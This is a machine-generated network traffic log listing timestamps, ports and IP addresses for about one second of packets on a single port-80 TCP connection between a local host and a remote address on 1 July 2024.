Jul 1, 2024 13:02:12.827780008 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.827789068 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.827819109 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.827990055 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.828001022 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.828033924 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.828039885 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.828049898 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.828061104 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.828072071 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.828079939 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.828108072 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.828130960 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.851028919 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.851073027 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.851083994 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.851095915 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.851113081 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.851135969 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.851196051 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.851207972 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.851236105 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.851254940 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.851488113 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.851500034 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.851511955 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.851527929 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.851551056 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.861696005 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.861731052 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.861742973 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.861754894 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.861800909 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.862029076 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.862041950 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.862052917 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.862063885 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.862076044 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.862082958 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.862098932 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.862113953 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.862540007 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.862550020 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.862560034 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.862575054 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.862584114 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.862593889 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.862601042 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.862623930 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.862648010 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.863102913 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.863115072 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.863125086 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.863147020 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.863173962 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.872208118 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.872262001 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.872286081 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.872296095 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.872320890 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.872338057 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.872571945 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.872584105 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.872594118 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.872622013 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.872648001 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.872909069 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.872917891 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.872956038 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.876676083 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.876724005 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.876744032 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.876776934 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.876802921 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.876946926 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.876961946 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.876972914 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.876991034 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.877017021 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.877280951 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.877291918 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.877326965 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.978710890 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.992301941 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.186976910 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.187012911 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.187024117 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.187109947 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.187128067 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.187232971 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.187275887 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.187422991 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.187436104 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.187448025 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.187458992 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.187467098 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.187488079 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.187515020 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.187947989 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.187958956 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.187989950 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.188009977 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.188585043 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.188631058 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.209182978 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.209268093 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.209306002 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.209316969 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.209352970 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.209428072 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.209436893 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.209467888 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.210895061 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.210959911 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.210984945 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.210997105 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.211020947 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.211039066 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.211225033 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.211277008 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.213988066 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.214060068 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.214085102 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.214199066 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.214210033 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.214241982 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.215958118 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.216728926 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.216785908 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.216813087 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.216825962 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.216851950 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.216869116 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.217607975 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.217658043 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.218220949 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.218270063 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.218295097 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.218306065 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.218341112 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.218826056 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.218871117 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.221299887 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.221365929 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.221389055 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.221400976 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.221426010 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.221442938 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.221563101 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.221606016 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.230638981 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.230691910 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.230704069 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.230715990 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.230731010 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.230746984 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.230930090 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.230967999 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.232311964 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.232383013 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.232418060 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.232430935 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.232474089 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.232640982 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.232707024 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.235599041 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.235661983 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.235699892 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.235711098 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.235835075 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.235861063 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.235908031 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.236989021 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.237047911 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.237070084 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.237080097 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.237112045 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.237186909 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.237221956 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.239898920 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.239950895 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.239972115 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.239988089 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.239995003 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.240025043 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.240119934 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.240128994 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.240155935 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.240173101 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.241555929 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.241605043 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.241611958 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.241622925 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.241657972 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.241724968 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.241761923 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.244148016 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.244225979 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.244237900 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.244333029 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.244399071 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.244440079 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.246999979 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.247065067 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.247086048 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.247097969 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.247126102 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.247272968 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.247309923 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.247684956 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.247735023 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.247766972 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.247776985 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.247805119 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.247874022 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.247920036 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.247960091 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.247997999 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.250216007 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.250298977 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.250305891 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.250317097 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.250344038 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.250447035 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.250483036 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.251632929 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.251709938 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.251763105 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.251774073 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.251796961 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.251815081 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.251933098 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.251980066 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.253251076 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.253330946 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.253355026 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.253366947 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.253398895 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.253530979 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.253570080 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.254255056 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.254303932 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.254348993 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.254360914 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.254395008 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.254513979 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.254559994 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.255687952 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.255733967 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.255784988 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.255795956 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.255831003 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.255850077 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.255969048 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.256009102 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.257019043 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.257062912 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.257107019 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.257117987 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.257149935 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.257167101 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.257282019 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.257320881 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.257769108 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.257808924 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.257858992 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.257869005 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.257905960 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.258130074 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.258171082 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.259171963 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.259224892 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.259278059 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.259288073 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.259325981 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.259469986 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.259514093 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.259881020 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.259927988 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.259948015 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.259958982 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.259980917 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.259998083 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.260149956 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.260190010 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.263183117 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.263247013 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.263253927 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.263263941 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.263281107 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.263294935 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.263526917 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.263571024 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.263593912 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.263602972 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.263614893 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.263622046 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.263628960 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.263665915 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.263895035 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.263905048 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.263915062 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.263942957 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.263957977 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.264153004 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.264199972 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.264854908 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.264899969 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.264921904 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.264930964 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.264952898 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.264967918 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.265103102 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.265146971 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.265651941 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.265697002 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.265713930 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.265747070 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.265845060 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.265853882 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.265892029 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.281425953 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.281452894 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.281502962 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.281539917 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.281579018 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.281737089 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.281748056 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.281759024 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.281781912 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.281796932 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.282058954 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.282105923 CEST	49705	80	192.168.2.5	147.45.78.162
